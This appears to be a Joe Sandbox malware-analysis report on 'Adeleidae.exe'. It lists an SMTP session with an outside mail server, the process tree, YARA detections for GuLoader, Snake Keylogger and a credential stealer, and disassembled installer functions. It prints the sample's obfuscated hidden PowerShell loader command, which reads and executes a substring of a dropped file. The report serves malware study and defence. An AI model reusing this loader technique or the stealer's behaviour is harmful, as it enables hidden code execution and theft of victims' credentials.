Oct 24, 2024 03:41:17.192507029 CEST	587	50022	213.165.67.102	192.168.2.4	250-kundenserver.de Hello 216041 [173.254.250.71] 250-8BITMIME 250-SIZE 141557760 250 STARTTLS
Oct 24, 2024 03:41:17.192709923 CEST	50022	587	192.168.2.4	213.165.67.102	STARTTLS
Oct 24, 2024 03:41:17.437714100 CEST	587	50022	213.165.67.102	192.168.2.4	220 OK

Target ID:	0
Start time:	21:39:23
Start date:	23/10/2024
Path:	C:\Users\user\Desktop\Adeleidae.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Adeleidae.exe"
Imagebase:	0x400000
File size:	931'792 bytes
MD5 hash:	9F3C578444B7F35F3D25EADD5695C162
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:39:27
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Imagebase:	0x170000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2435373853.0000000009251000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:39:27
Start date:	23/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:40:30
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xa30000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3023161132.0000000025878000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	27%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1303
Total number of Limit Nodes:	45

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Adeleidae.exe",00000000), ref: 00403363
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Adeleidae.exe",00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
DeleteFileW.KERNELBASE(1033), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Adeleidae.exe",00000000,?), ref: 0040362B
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Adeleidae.exe",00000000,?), ref: 0040363A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Adeleidae.exe",00000000,?), ref: 00403645
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Adeleidae.exe",00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(C:\Users\user\Desktop\Adeleidae.exe,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

SeShutdownPrivilege, xrefs: 0040374D
"C:\Users\user\Desktop\Adeleidae.exe", xrefs: 00403356, 0040335C, 00403553
C:\Users\user\AppData\Local\Temp\, xrefs: 004034BA, 004034BF, 004034D5, 004034E1, 004034F0, 004034FD, 00403509, 00403511, 00403628, 00403639, 00403644, 00403650, 0040365D, 0040366C, 0040371D
Low, xrefs: 004034F8
TEMP, xrefs: 0040350A
\Temp, xrefs: 004034DC
USERENV, xrefs: 004032F1
~nsu, xrefs: 00403623
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 004035D3
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 004034A8, 004035C8, 00403673, 0040367D
C:\Users\user\Desktop\Adeleidae.exe, xrefs: 004036D6
.tmp, xrefs: 0040363F
NSIS Error, xrefs: 00403341
1033, xrefs: 00403526
C:\Users\user\Desktop, xrefs: 0040364A, 0040364F, 0040367C
SETUPAPI, xrefs: 004032FB
Error launching installer, xrefs: 004035AD
UXTHEME, xrefs: 004032E7
TMP, xrefs: 00403512

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Adeleidae.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$C:\Users\user\Desktop$C:\Users\user\Desktop\Adeleidae.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3045458659
Opcode ID: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: 7aacc1c0a5729f3ef0a85289c626a3cb867d7b07120bbbf6836a4d0ed1df39ea
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

N, xrefs: 00404DBB
, xrefs: 004050E9
M, xrefs: 00404CDA

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D8A2), ref: 0040613A
GetSystemDirectoryW.KERNEL32(Space required: ,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(Space required: ,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,Space required: ), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(Space required: ,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D8A2), ref: 0040629E

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
Space required: , xrefs: 004060A1, 00406181, 004061A2, 004061B7, 004061CA, 004061E6, 00406211, 00406243, 00406249, 00406263, 00406277, 00406297, 0040629D, 004062A9, 004062DC
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1002770640
Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00405846 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 0040586F
lstrcatW.KERNEL32(Indmelderes\Hemicrany.Uni111,\*.*,Indmelderes\Hemicrany.Uni111,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,Indmelderes\Hemicrany.Uni111,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,Indmelderes\Hemicrany.Uni111,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 004058E0
FindFirstFileW.KERNELBASE(Indmelderes\Hemicrany.Uni111,?,?,?,0040A014,?,Indmelderes\Hemicrany.Uni111,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

"C:\Users\user\Desktop\Adeleidae.exe", xrefs: 0040584F
Indmelderes\Hemicrany.Uni111, xrefs: 0040589F, 004058A5, 004058B6, 004058EF
C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
\*.*, xrefs: 004058B1

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Adeleidae.exe"$C:\Users\user\AppData\Local\Temp\$Indmelderes\Hemicrany.Uni111$\*.*
API String ID: 2035342205-4116716777
Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 00406398 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,004302B8,C:\,00405B5A,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
FindClose.KERNEL32(00000000), ref: 004063AF

Strings

C:\, xrefs: 00406398

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes
API String ID: 542301482-2295479969
Opcode ID: c9022358312334301b7f12b82a851e8225c8b7b61dd5b1f0802db8af2cd3e825
Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
Opcode Fuzzy Hash: c9022358312334301b7f12b82a851e8225c8b7b61dd5b1f0802db8af2cd3e825
Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 004038B8

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

